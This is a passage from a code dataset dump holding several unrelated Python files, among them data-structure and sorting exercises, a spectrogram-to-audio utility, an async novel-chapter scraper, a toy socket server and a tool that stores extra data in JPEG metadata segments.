0\n while current:\n count += 1\n current = current.next\n return count\n\n def search(self, data):\n pass\n\n def printList(self):\n current = self.head\n while current:\n print(current.data)\n current = current.getNext()\n\nprint('-- Create list and add \\'1\\'--')\nList = LinkedList()\nList.InsertAtTail('1')\nList.printList()\nprint('-- Insert \\'A\\' & \\'B\\'-----------')\nList.InsertAtHead('A')\nList.InsertAtHead('B')\nList.printList()\nprint('-- Insert \\'C\\'-----------')\nList.InsertAtTail('C')\nList.printList()\nprint('-- Delete \\'A\\'-----------')\nList.DeleteNode('A')\nList.printList()\nprint('-- Empty the list -----------')\nList.EmptyList()\nprint('Size: ', List.size())\nList.printList()\n\n# Force garbage collection\n#gc.collect()\noldcounts = gc.get_count()\n#del List\ngc.collect()\nnewcounts = gc.get_count()\nprint(oldcounts, newcounts)\n","sub_path":"linked_lists/python/llist.py","file_name":"llist.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"270135336","text":"\"\"\"\nGiven a menu (list of items prices), find all possible combinations of items \nthat sum a particular value K.\n\nReturn the combination with the minimum number of items. \nTime complexity O(MN), where M is the target value and N is the number of \ndistinct items. Space complexity O(M).\n\"\"\"\ndef item_combinations(prices, target):\n \"\"\"\n Find all the combinations that sum to target.\n \"\"\"\n res, cur = set([]), []\n \n def backtrack(target, start):\n if abs(target) < 0.01:\n res.add(tuple(cur))\n elif target > 0:\n for pos in range(start, len(prices)):\n cur.append(prices[pos])\n backtrack(target - prices[pos], pos)\n cur.pop()\n \n backtrack(target, 0)\n return res\n \n\ndef least_item_combination(prices, target):\n \"\"\"\n Return the size of combination with least number of items.\n dp[k] = min(dp[k], dp[k-n] + 1) for all n <= k and n in items.\n O(tn) time where t is target and n is the number of items, O(t) space.\n \"\"\"\n # convert the input to integer for precision purposes\n target = int(target * 100)\n prices = [int(p * 100) for p in prices]\n count = [target for _ in range(target + 1)]\n count[0] = 0 # empty set sum to 0\n for i in range(1, len(count)):\n for p in prices:\n if p <= i:\n count[i] = min(count[i], count[i - p] + 1)\n return count[-1]\n \n \n# test\nimport unittest\nclass Tester(unittest.TestCase):\n def setUp(self):\n self.arr1 = [2.1, 2.4, 3.0, 4.0, 4.2, 5.0] \n self.arr2 = [2, 3, 4, 5]\n \n def testCombination(self):\n res1 = item_combinations(self.arr1, 8.4)\n expect1 = set([\n (2.1, 2.1, 2.1, 2.1), (2.4, 3.0, 3.0), (2.1, 2.1, 4.2), (4.2, 4.2),\n ])\n self.assertEqual(res1, expect1)\n res2 = item_combinations(self.arr2, 8)\n expect2 = set([\n (2, 2, 2, 2), (2, 2, 4), (2, 3, 3), (4, 4), (3, 5)\n ])\n self.assertEqual(res2, expect2)\n \n def testLeastCombination(self):\n self.assertEqual(2, least_item_combination(self.arr1, 7.4))\n self.assertEqual(2, least_item_combination(self.arr2, 8))\n \nunittest.main()\n","sub_path":"src/main/python/company/menu_combination_sum.py","file_name":"menu_combination_sum.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"432354828","text":"#!/usr/bin/env python\nimport math\nimport time\nn = int(input('Please input range: '))\na = []\nfor i in range(n + 1):\n a.append(i)\na[1] = 0\nrt = int(math.sqrt(n))\ncnt = 0\nstart = time.time()\nfor i in range(2, rt + 1, 1):\n #cnt += 1\n for j in range(i * i, n + 1, i):\n #输出多少个零则有多少个数被重复筛选,需要进一步优化,保证每个数只被筛选一次\n #print(a[j])\n a[j] = 0\n #cnt += 1\nstop = time.time()\nprint(\"----------split line----------\")\nprint(list(filter(lambda x:x > 0,a)))\nprint(\"calc times: \" + str(cnt))\nprint(\"duration: \" + str((stop-start)*1000))\n","sub_path":"sievePrime.py","file_name":"sievePrime.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"468030365","text":"#Maddy Chan 11/28/15\n#sorts, sorts, sorts!\n#sorts take a list and a greater than function\n#the greater than function is there so that the sort will work for any data type\n\nfrom collections import defaultdict\n\ndef gtInt(a:int,b:int) -> bool:\n return a > b\n\n#selection sort - mutates list\n\ndef selection(l: list, gt) -> None:\n for i in range(len(l)):\n minIndex = i\n for j in range(i+1, len(l)):\n if gt(l[minIndex],l[j]):\n minIndex = j\n l[minIndex], l[i] = l[i], l[minIndex]\n\n#insertion sort - mutates list\n\ndef insertion(l:list, gt) -> None:\n for i in range(1,len(l)):\n comp_index, current = i-1, i\n while comp_index >=0 and gt(l[comp_index],l[current]):\n l[current], l[comp_index] = l[comp_index], l[current]\n comp_index -=1\n current -=1\n\n\n#merge sort - returns sorted list\n\ndef merge(l: list, gt) -> list:\n #if base case of one element, return that element\n if len(l) == 1:\n return l\n \n #setting variables - halfpoint, answer list, the sorted front and back arrays\n half, answer = int(len(l)/2), []\n front, back = merge(l[:half],gt), merge(l[half:],gt)\n\n #merging the two sorted lists into one\n while len(front) != 0 and len(back) != 0:\n if gt(front[0],back[0]):\n answer.append(back[0])\n back.pop(0)\n else:\n answer.append(front[0])\n front.pop(0)\n\n #adding the last leftover element\n answer.append(front[0] if len(front) == 1 else back[0])\n return answer\n\n#bucket sort - returns sorted list\n\ndef bucket(l:list) -> list:\n answer_dict, answer = defaultdict(int), []\n for a in l:\n answer_dict[a] +=1\n for a in sorted(answer_dict.keys()):\n for i in range(answer_dict[a]):\n answer.append(a)\n return answer\n\n#quick sort - returns sorted list - NOT DONE YET\n\n##def quick(l:list, gt):\n## if len(l) == 1 or len(l) == 0:\n## return l\n## pivot = l[-1]\n## start = 0\n## end = len(l)-1\n## while(start != end):\n## while gt(pivot,l[start]) and start < end:\n## start+=1\n## while gt(l[end],pivot) and end > start:\n## end-=1\n## l[start],l[end] = l[end],l[start]\n## answer = quick(l[0:start],gt)\n## answer.append(l[start])\n## answer.extend(quick(l[end+1:],gt))\n## return answer\n \n\n#l = [3,2,5,4,2,3,5,4,3,1]\nl = [3,2,4,5,1,6,9,7,8]\n#l = ['a','b','c','y','t','e','j']\n#print(merge(l,gtInt))\n#print(quick(l,gtInt))\n#insertion(l,gtInt)\n#print(l)\n","sub_path":"sorts.py","file_name":"sorts.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"243586157","text":"# Calculator App using Pygame\n\nimport pygame\n\n\ndef main():\n pygame.init()\n window_size = (1290, 800)\n pygame.display.set_mode(window_size)\n pygame.display.set_caption(\"Calculator\")\n window_surface = pygame.display.get_surface()\n game = Game(window_surface)\n game.play()\n pygame.quit()\n\nclass Game:\n def __init__(self, surface):\n # game specific variables\n self.surface = surface\n self.continue_game = True\n self.clock = pygame.time.Clock()\n self.fps = 60\n\n def play(self):\n while self.continue_game:\n self.clock.tick(self.fps)\n self.event_handler()\n self.draw()\n\n def event_handler(self):\n events = pygame.event.get()\n for event in events:\n if event.type == pygame.QUIT:\n self.continue_game = False\n\n def draw(self):\n pygame.display.update()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"25078161","text":"from dinterpol import Template\nfrom sys import stderr\nfrom traceback import print_exc\nfrom pprint import pformat\n\n\nclass PluginRuntimeCore(object):\n\n def __init__(self, config=None):\n self.initial_config = config\n self.config_template = Template(config)\n self.failed_count = 0\n self.init()\n\n def _on_input(self, item):\n try:\n if item is not None:\n self.config = self.config_template.render(item)\n except: # NOQA: E722\n print_exc(file=stderr)\n msg = (\n \"---------- Plugin %s dynamic config resolution failed ----------\" % self.plugin_label)\n print(msg, file=stderr)\n print(pformat(item), file=stderr)\n # raise(\n self.failed_count += 1\n exit(1)\n if item is None:\n on_complete_func = getattr(self, 'on_complete', None)\n if on_complete_func:\n on_complete_func()\n self.put(item)\n else:\n try:\n self.on_input(item)\n except SystemExit:\n exit(1)\n except: # NOQA: E722\n self._execution_error(item)\n finally:\n if self.failed_count != 0:\n exit(1)\n\n def _execution_error(self, item):\n print_exc(file=stderr)\n msg = (\n \"---------- Plugin %s execution failed ----------, item content:\"\n % (self.plugin_label))\n print(msg, file=stderr)\n print(pformat(item), file=stderr)\n self.failed_count += 1\n","sub_path":"mdatapipe/core/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"252178414","text":"_base_ = [\n '../_base_/models/convnext_v2/atto.py',\n '../_base_/datasets/imagenet_bs64_swin_224.py',\n '../_base_/schedules/imagenet_bs1024_adamw_swin.py',\n '../_base_/default_runtime.py',\n]\n\n# dataset setting\ntrain_dataloader = dict(batch_size=32)\n\n# schedule setting\noptim_wrapper = dict(\n optimizer=dict(lr=8e-4, weight_decay=0.3),\n clip_grad=None,\n)\n\n# learning policy\nparam_scheduler = [dict(type='CosineAnnealingLR', eta_min=1e-5, by_epoch=True)]\n\n# train, val, test setting\ntrain_cfg = dict(by_epoch=True, max_epochs=600, val_interval=1)\n\n# runtime setting\ncustom_hooks = [dict(type='EMAHook', momentum=1e-4, priority='ABOVE_NORMAL')]\n","sub_path":"configs/convnext_v2/convnext-v2-atto_32xb32_in1k.py","file_name":"convnext-v2-atto_32xb32_in1k.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"249165523","text":"\"\"\"\nSummary: Recover spectrogram to wave.\nAuthor: Qiuqiang Kong\nCreated: 2017.09\nModified: -\n\"\"\"\nimport numpy as np\nimport numpy\nimport decimal\n\ndef recover_wav(pd_abs_x, gt_x, n_overlap, winfunc, wav_len=None, irr_mask=False):\n \"\"\"Recover wave from spectrogram.\n If you are using scipy.signal.spectrogram, you may need to multipy a scaler\n to the recovered audio after using this function. For example,\n recover_scaler = np.sqrt((ham_win**2).sum())\n\n Args:\n pd_abs_x: 2d array, (n_time, n_freq)\n gt_x: 2d complex array, (n_time, n_freq)\n n_overlap: integar.\n winfunc: func, the analysis window to apply to each frame.\n wav_len: integer. Pad or trunc to wav_len with zero.\n\n Returns:\n 1d array.\n \"\"\"\n \n if irr_mask:\n x = pd_abs_x * np.abs(gt_x)\n else:\n x = pd_abs_x\n \n x = real_to_complex(x, gt_x)\n x = half_to_whole(x)\n \n frames = ifft_to_wav(x)\n (n_frames, n_window) = frames.shape\n s = deframesig(frames=frames, siglen=0, frame_len=n_window,\n frame_step=n_window-n_overlap, winfunc=winfunc)\n if wav_len:\n s = pad_or_trunc(s, wav_len)\n return s\n\ndef real_to_complex(pd_abs_x, gt_x):\n \"\"\"Recover pred spectrogram's phase from ground truth's phase.\n\n Args:\n pd_abs_x: 2d array, (n_time, n_freq)\n gt_x: 2d complex array, (n_time, n_freq)\n\n Returns:\n 2d complex array, (n_time, n_freq)\n \"\"\"\n theta = np.angle(gt_x)\n cmplx = pd_abs_x * np.exp(1j * theta)\n return cmplx\n\ndef half_to_whole(x):\n \"\"\"Recover whole spectrogram from half spectrogram.\n \"\"\"\n return np.concatenate((x, np.fliplr(np.conj(x[:, 1:-1]))), axis=1)\n\ndef ifft_to_wav(x):\n \"\"\"Recover wav from whole spectrogram\"\"\"\n return np.real(np.fft.ifft(x))\n\ndef pad_or_trunc(s, wav_len):\n if len(s) >= wav_len:\n s = s[0 : wav_len]\n else:\n s = np.concatenate((s, np.zeros(wav_len - len(s))))\n return s\n\ndef recover_gt_wav(x, n_overlap, winfunc, wav_len=None):\n \"\"\"Recover ground truth wav.\n \"\"\"\n x = half_to_whole(x)\n frames = ifft_to_wav(x)\n (n_frames, n_window) = frames.shape\n s = deframesig(frames=frames, siglen=0, frame_len=n_window,\n frame_step=n_window-n_overlap, winfunc=winfunc)\n if wav_len:\n s = pad_or_trunc(s, wav_len)\n return s\n\ndef deframesig(frames,siglen,frame_len,frame_step,winfunc=lambda x:numpy.ones((x,))):\n \"\"\"Does overlap-add procedure to undo the action of framesig.\n Ref: From https://github.com/jameslyons/python_speech_features\n\n :param frames: the array of frames.\n :param siglen: the length of the desired signal, use 0 if unknown. Output will be truncated to siglen samples.\n :param frame_len: length of each frame measured in samples.\n :param frame_step: number of samples after the start of the previous frame that the next frame should begin.\n :param winfunc: the analysis window to apply to each frame. By default no window is applied.\n :returns: a 1-D signal.\n \"\"\"\n frame_len = round_half_up(frame_len)\n frame_step = round_half_up(frame_step)\n numframes = numpy.shape(frames)[0]\n assert numpy.shape(frames)[1] == frame_len, '\"frames\" matrix is wrong size, 2nd dim is not equal to frame_len'\n\n indices = numpy.tile(numpy.arange(0,frame_len),(numframes,1)) + numpy.tile(numpy.arange(0,numframes*frame_step,frame_step),(frame_len,1)).T\n indices = numpy.array(indices,dtype=numpy.int32)\n padlen = (numframes-1)*frame_step + frame_len\n\n if siglen <= 0: siglen = padlen\n\n rec_signal = numpy.zeros((padlen,))\n window_correction = numpy.zeros((padlen,))\n win = winfunc(frame_len)\n\n for i in range(0,numframes):\n window_correction[indices[i,:]] = window_correction[indices[i,:]] + win + 1e-15 #add a little bit so it is never zero\n rec_signal[indices[i,:]] = rec_signal[indices[i,:]] + frames[i,:]\n\n rec_signal = rec_signal/window_correction\n return rec_signal[0:siglen]\n\ndef round_half_up(number):\n return int(decimal.Decimal(number).quantize(decimal.Decimal('1'), rounding=decimal.ROUND_HALF_UP))\n","sub_path":"mixture2clean_dnn/spectrogram_to_wave.py","file_name":"spectrogram_to_wave.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"419896939","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse\nimport re\nimport time\nimport os.path\nimport logging\nimport asyncio\nimport aiohttp\nimport requests\nimport urllib3\nimport tqdm\nimport shutil\n\nURL = 'http://www.9dxs.com/3/3024/'\nDIR_PATH = '_tmp'\nCHAPTER_ENCODING = 'utf8'\nCONTENT_ENCODING = 'utf8'\n\nHEADERS = {\n \"User-Agent\": (\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.3\"\n \"6 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\"),\n \"Accept\": (\"text/html,application/xhtml+xml,application/xml;q=0.9,image/we\"\n \"bp,image/apng,*/*;q=0.8\")\n}\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(level=logging.INFO)\nhandler = logging.FileHandler(\"log.txt\", encoding='utf8')\nhandler.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s'\n ' - %(message)s')\nhandler.setFormatter(formatter)\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.ERROR)\n\nlogger.addHandler(handler)\nlogger.addHandler(console)\n\nsema = asyncio.BoundedSemaphore(5)\n\n\nclass AsnycSpider():\n def __init__(self, url, downloaddir=DIR_PATH):\n parse_string = urlparse(url)\n if parse_string.scheme == 'https':\n self.SSL = True\n else:\n self.SSL = False\n self.url = url + '/' if not url.endswith('/') else url\n self.chapter_list = list()\n self.downloaddir = downloaddir\n\n def download(self, first, last):\n self.__get_chapters(first, last)\n self.eventloop()\n\n def get_absolute_path(self, path):\n pattern = re.compile(r\"^.*/\")\n return re.sub(pattern, \"\", path)\n\n def __get_first_html(self, url_str):\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n response = requests.get(url_str, headers=HEADERS, verify=self.SSL)\n return response.text.encode(response.encoding).decode(CHAPTER_ENCODING)\n\n def __get_chapters(self, first=None, last=None):\n begin = time.time()\n time_str = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(begin))\n print('First Page Job at {}.'.format(time_str))\n html_string = self.__get_first_html(self.url + 'index.html')\n chapters = self.parse_chapter(html_string)\n first = 0 if first is None else first\n last = len(chapters) if last is None else last\n self.chapter_list = chapters[first:last]\n end = time.time()\n print('First Page take {:.4} seconds.'.format(end - begin))\n\n async def get_content_from_url(self, url):\n respdata = ''\n try:\n async with aiohttp.ClientSession() as session:\n async with sema, session.get(url, headers=HEADERS,\n timeout=300) as r:\n if r.status == 200:\n respdata = await r.text(encoding=CONTENT_ENCODING,\n errors='ignore')\n else:\n logging.error(\n '{} is blocked, status code: '.format(url),\n r.status)\n except Exception as e:\n logging.exception('Error for {}'.format(e), exc_info=True)\n return respdata\n\n async def handle_tasks(self, task_id, work_queue):\n while not work_queue.empty():\n current_url = await work_queue.get()\n try:\n await self.process_request(current_url)\n except Exception as e:\n logging.exception('Error for {}'.format(e), exc_info=True)\n\n def eventloop(self):\n start = time.time()\n timestr = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(start))\n print('Start Download Job at {}.'.format(timestr))\n q = asyncio.Queue()\n [q.put_nowait(url) for url in self.chapter_list]\n loop = asyncio.get_event_loop()\n tasks = [\n self.handle_tasks(\n task_id,\n q,\n ) for task_id in range(len(self.chapter_list))\n ]\n loop.run_until_complete(self.wait_with_progress(tasks))\n end = time.time()\n print('Total take {:.4} seconds.'.format(end - start))\n loop.close()\n\n async def wait_with_progress(self, tasks):\n return [\n await f for f in tqdm.tqdm(\n asyncio.as_completed(tasks), ascii=True, total=len(tasks))\n ]\n\n async def process_request(self, url):\n html = await self.get_content_from_url(url['href'])\n formated_html = self.parse_content(url['text'], html)\n target_file = os.path.join(self.downloaddir,\n self.__get_filename(url['href']) + '.txt')\n filename = os.path.abspath(target_file)\n self.__save_to_file(self.custom_strip(formated_html), filename,\n url['text'])\n return 'Completed'\n\n def __get_filename(self, m):\n pattern = re.compile(r'http.*/(\\d*).html')\n items = re.findall(pattern, m)\n if (items):\n return items[0]\n else:\n return ''\n\n def custom_strip(self, x):\n remove_tag1 = re.compile(r' ')\n remove_tag2 = re.compile(r' ')\n x = re.sub(remove_tag1, '\\n', x)\n x = re.sub(remove_tag2, ' ', x)\n return x.strip()\n\n def __save_to_file(self, content, fileName, title):\n path = os.path.dirname(fileName)\n if not os.path.exists(path):\n os.makedirs(path)\n with open(fileName, 'w', encoding='utf-8') as f:\n logger.info('Write {} ==> {} successful.'.format(title, fileName))\n f.write(content)\n\n def merge_file(self, filename):\n target_list = os.path.abspath(os.path.join(self.downloaddir))\n filelist = os.listdir(target_list)\n filelist.sort()\n with open(filename, 'w', encoding='utf-8') as outfile:\n for fname in tqdm.tqdm(filelist, ascii=True):\n real_file = os.path.abspath(\n os.path.join(self.downloaddir, fname))\n with open(real_file, 'r', encoding='utf-8') as infile:\n for line in infile:\n outfile.write(line)\n outfile.write('\\n\\n')\n logger.info('Write {} successful.'.format(real_file))\n shutil.rmtree(self.downloaddir, ignore_errors=True)\n\n def parse_content(self, title, html):\n return ''\n\n def parse_chapter(self, html):\n return ''\n\n\nclass NovelSpider(AsnycSpider):\n def __init__(self, url, downloaddir=DIR_PATH):\n super().__init__(url, downloaddir=downloaddir)\n\n def parse_content(self, title, html):\n formated_html = ''\n try:\n soup = BeautifulSoup(html, 'lxml')\n content = soup.find(\"div\", attrs={\"class\": \"content\"})\n content = content.get_text('\\n\\n ', strip=True)\n formated_html = '{}\\n\\n{}'.format(title, content)\n except Exception as e:\n raise e\n return formated_html\n\n def parse_chapter(self, html):\n chapter_list = list()\n try:\n soup = BeautifulSoup(html, 'lxml')\n chapter_div = soup.find(id='novel56235')\n hrefs = chapter_div.find_all('dd')\n chapter_list = [{\n 'href':\n self.url + self.get_absolute_path(i.find('a').get('href')),\n 'text':\n i.find('a').text\n } for i in hrefs if i.find('a')]\n except Exception as e:\n raise e\n return chapter_list\n\n def custom_strip(self, x):\n # remove_tag1 = re.compile(r'( | )+')\n # remove_tag2 = re.compile(r'( ){4}')\n # x = re.sub(remove_tag1, '\\n\\n', x)\n # x = re.sub(remove_tag2, '\\n\\n', x)\n return x.strip()\n\n\nif __name__ == \"__main__\":\n spider = NovelSpider('https://www.77nt.com/56235/')\n spider.download(4100, 4102)\n spider.merge_file(\"target.txt\")\n","sub_path":"gaishidizun.py","file_name":"gaishidizun.py","file_ext":"py","file_size_in_byte":8057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"494107772","text":"#coding:utf-8\nimport socket\nimport time\nfrom selectors import DefaultSelector, EVENT_READ, EVENT_WRITE\nselector = DefaultSelector()\n\nstopped = False\n\nresponse = b'HTTP/1.0 200 OK\\r\\nDate: Mon, 1 Jan 1996 01:01:01 GMT\\r\\n'\nresponse += b'Content-Type: text/plain\\r\\nContent-Length: 13\\r\\n'\nresponse += b'hello world'\n\nclass Future:\n def __init__(self):\n self.result = None\n self._callback = []\n\n def add_done_callback(self, fn):\n self._callback.append(fn)\n\n def set_result(self, result):\n self.result = result\n for fn in self._callback:\n fn(self)\n\n def __iter__(self):\n yield self\n return self.result\n\n\nclass Task:\n def __init__(self, coro):\n self.coro = coro\n f = Future()\n f.set_result(None)\n self.step(f)\n\n def step(self, future):\n try:\n next_future = self.coro.send(future.result)\n print(\"next_future: \", next_future)\n except StopIteration as e:\n print(\"step stop :\", e.value)\n return\n\n next_future.add_done_callback(self.step)\n\n\nclass ConHandler(object):\n def __init__(self, con, addr):\n self.con = con # 新连接实例\n self.addr = addr # 新连接地址\n\n def _read_ready(self):\n f = Future()\n\n def sock_read(): # 由于没有解析相应的流协议,所以这里直接接受所有的数据,\n # 如果解析具体协议也可以改写成协程\n all_data = b\"\" # 接受数据\n while True: # 一直接受数据直到数据接受完成\n try:\n data = self.con.recv(10)\n if data:\n print(\"recv data : \", data)\n all_data += data\n else:\n print(\"break while\")\n break\n except BlockingIOError:\n print(\"BlockingIOError\")\n break\n print(\"all_data\", all_data)\n # selector.unregister(self.con.fileno())\n f.set_result(None) # 当数据接受完成后,调用f实例的回调方法,进入将主流程往下执行一步\n\n selector.register(self.con.fileno(), EVENT_READ, sock_read) # 注册连接的读事件并注册回调函数\n yield f\n selector.unregister(self.con.fileno()) # 取消连接的注册事件\n\n def fetch(self):\n # 读事件到来一次读完\n fu = yield from self._read_ready() # 调用读数据\n print(\"recv_data: \", fu)\n # handler 处理请求\n self.response = response*10000\n time.sleep(1)\n result = yield from self.sock_send_all() # 将处理的数据发送出去\n print(\"send after : \", result)\n\n def sock_send_all(self):\n send_length = yield from self.sock_send() # 发送相应数据,返回发送的数据长度\n self.response = self.response[send_length:] # 减去已经发送的数据长度\n while send_length: # 如果发送长度不为0\n send_length = yield from self.sock_send() # 继续发送数据\n self.response = self.response[send_length:] # 减去已经发送的数据长度\n return\n\n def sock_send(self):\n f = Future()\n\n def _sock_send():\n con_length = self.con.send(self.response)\n f.set_result(con_length)\n selector.register(self.con.fileno(), EVENT_WRITE, _sock_send)\n send_length = yield f\n selector.unregister(self.con.fileno())\n return send_length\n\n\ndef create_server():\n sock = socket.socket() # 创建连接\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # 设置端口重用\n sock.bind(('0.0.0.0', 8080)) # 设置监听连接端口\n sock.listen(10) # 设置监听缓存区\n sock.setblocking(0) # 设置连接非阻塞\n\n def sock_accept(): # 如果sock的新请求连接处理回调函数\n try:\n conn, addr = sock.accept() # 接受新请求\n conn.setblocking(False) # 设置接受新连接非阻塞\n print(conn)\n except Exception:\n pass\n Task(ConHandler(conn, addr).fetch()) # 用任务类包裹处理流程,使之流程协程处理\n\n selector.register(sock.fileno(), EVENT_READ, sock_accept) # 注册sock的连接读事件并设置读事件的回调函数\n\n\ndef loop():\n while not stopped:\n events = selector.select() # 获取触发的事件\n for event_key, event_mask in events:\n callback = event_key.data # 获取触发事件的回调函数\n callback() # 执行回调函数\n\nif __name__ == '__main__':\n create_server()\n loop()","sub_path":"advance/socket/server_s4.py","file_name":"server_s4.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"624235196","text":"#!/usr/bin/env python3\n\n\"\"\"\npython semestral work\nTomas Dvoracek\ndvorato9@fit.cvut.cz\nFaculty of Information Technology\nCzech Technical University in Prague\n\nProgram for saving/extracting metadata to/from jpeg.\n\nISSUES:\n some programs erase APP data - IfranView for example \n\"\"\"\nimport os\nimport sys\nfrom argparse import ArgumentParser\nfrom PIL import Image\n\n\n# Functions\n# ------------------------------------------------------------------------------\ndef check_file(file_name, file_mode):\n \"\"\"\n Function checks if file exists and is accessible with provided mode.\n\n :param file_name: string with path to file\n :param file_mode: os constant, for example os.R_OK\n :return: Returns False if file does not exists or is not accessible\n \"\"\"\n if os.path.isfile(file_name) and os.access(file_name, file_mode):\n return True\n return False \n\n\n# ------------------------------------------------------------------------------\ndef get_metadata(data):\n \"\"\"\n Reads all metadata and data.\n\n Function count all APP0-15 (ffe{0-f}) and comment (fffe) as metadata. Start of\n image is any other header then these. Usually it is start of quantization\n table (ffdb).\n\n :param data: Bytes representing jpeg file, pass WITHOUT 2 first bytes (FFD8)\n :return: list of (header, metadata), bytes(image_data) \n \"\"\"\n index = 0\n # create list of metadata headers\n metadata_list = list()\n metadata_header_list = ['ffe'+str(i) for i in range(10)]\n metadata_header_list += ['ffe'+chr(ord(str(i)) + ord('a')) for i in range(6)]\n metadata_header_list.append('fffe')\n \n while True:\n # HEADER TYPE = 2B | DATA LENGTH + 2 = 2B | DATA\n # length of data and header, but\n # t81 says, it should be only length of following data\n header = data[index:index+2].hex()\n length = int(data[index+2:index+4].hex(), base=16)\n if length < 2:\n print(\"Corrupted metadata.\", file=sys.stderr)\n exit(9)\n if header in metadata_header_list:\n metadata_list.append((header, data[index:index+2+length]))\n # shift to next header\n index = index + 2 + length\n else:\n break\n \n return metadata_list, data[index:]\n\n\n# ------------------------------------------------------------------------------\ndef pack_data(original_file_name, metadata_file_name, output_file_name):\n \"\"\"\n Create new file with metadata.\n\n Function reads original file, crops it and copy metadata from original file,\n because they are lost during cropping. Then it replaces part of original\n metadata stored in APP3 with metadata specified in metadata_file. Image is\n saved as output_file_name.\n\n :param original_file_name: string with path to original file\n :param metadata_file_name: string with path to metadata file\n :param output_file_name: string with path to output file\n :return: None\n \"\"\"\n with open(original_file_name, mode='rb') as original_file:\n original_file_bytes = original_file.read()\n\n with open(metadata_file_name, mode='rb') as metadata_file:\n metadata_file_bytes = metadata_file.read()\n\n if original_file_bytes[:3].hex() != 'ffd8ff':\n print('This in not jpeg file.', file=sys.stderr)\n exit(7)\n\n # crop image, copy all metadata as possible with pillow\n image = Image.open(original_file_name) \n # cropping left half of image\n new_image = image.crop((0, 0, image.size[0]/2, image.size[1]))\n try:\n new_image.save(output_file_name, 'JPEG', icc_profile=image.info.get('icc_profile'),\n exif=image.info.get('exif'), quality=95)\n except OSError:\n print('Problem when cropping image with pillow. Do not hate me, hate them.',\n file=sys.stderr)\n exit(8) \n \n with open(output_file_name, mode='rb') as output_file:\n output_file_bytes = output_file.read()\n\n # read current APP0-2, remove APP3, read rest of file\n # write in order, because some programs then do not work \n # with exif metadata correctly\n input_metadata, dummy = get_metadata(original_file_bytes[2:])\n output_metadata, data_after = get_metadata(output_file_bytes[2:])\n \n metadata_list = list()\n # split metadata to blocks. max APP block size is 65535 B\n # 2B - header length, 4B - string with block info, 1B - null byte = 7 B\n # Data itself have 65535 - 7 = 65528\n for index in range((len(metadata_file_bytes)//65528)+1):\n metadata_list.append(metadata_file_bytes[index*65528:(index+1)*65528]) \n \n # write jpeg start of image\n with open(output_file_name, mode='wb') as output_file:\n output_file.write(bytes.fromhex('ffd8'))\n\n # APP metadata that should be stored before my metadata\n # some programs have problems with metadata blocks not in order\n # APP0 - APP1 from changed file after cropping\n for index in output_metadata:\n if index[0] == 'ffe0' or index[0] == 'ffe1':\n output_file.write(index[1])\n \n # APP2 from original file\n # Exif data - they are changed during cropping\n for index in input_metadata:\n if index[0] == 'ffe2':\n output_file.write(index[1])\n\n # write my own metadata\n for index in metadata_list:\n # header of APP3\n output_file.write(bytes.fromhex('ffe3'))\n # length of data segment with name and null byte\n output_file.write((7 + len(index)).to_bytes(2, byteorder='big'))\n # string description of APP segment with null byte at the end\n output_file.write(bytes('moje', 'ascii') + bytes.fromhex('00'))\n # write APP data\n output_file.write(index)\n \n # write rest of metadata APP4-APP15\n for index in input_metadata:\n if index[0] not in ['ffe0, ffe1, ffe2, ffe3']:\n output_file.write(index[1])\n\n # write rest of image from cropped file\n output_file.write(data_after)\n\n\n# ------------------------------------------------------------------------------\ndef extract_data(encoded_file_name, output_file_name):\n \"\"\"\n Extracts data from image.\n\n :param encoded_file_name: string with path to image with stored metadata\n :param output_file_name: string with path to new created file with metadata\n :return: None\n \"\"\"\n with open(encoded_file_name, mode='rb') as encoded_file:\n encoded_file_bytes = encoded_file.read()\n\n if encoded_file_bytes[:3].hex() != 'ffd8ff':\n print('This in not jpeg file.', file=sys.stderr)\n exit(6)\n \n # read metadata, you do not need image data\n metadata_list, dummy = get_metadata(encoded_file_bytes[2:])\n\n with open(output_file_name, mode='wb') as output_file:\n for index in metadata_list:\n # write only APP3\n if index[0] == 'ffe3':\n # write if their header is not changed\n if (index[1][4:8].decode('ascii') == 'moje' and\n index[1][8] == 0):\n # write only data, not with header\n output_file.write(index[1][9:])\n\n\n# ------------------------------------------------------------------------------\ndef main():\n \"\"\"\n Main function for python semestral work.\n\n Function read arguments from command line and checks them. Then it checks\n file existence and permissions. Based on arguments it calls extract_data()\n or pack_data().\n \"\"\"\n\n # Arguments\n # ------------------------------------------------------------------------------\n parser = ArgumentParser(description=\"\"\"\n 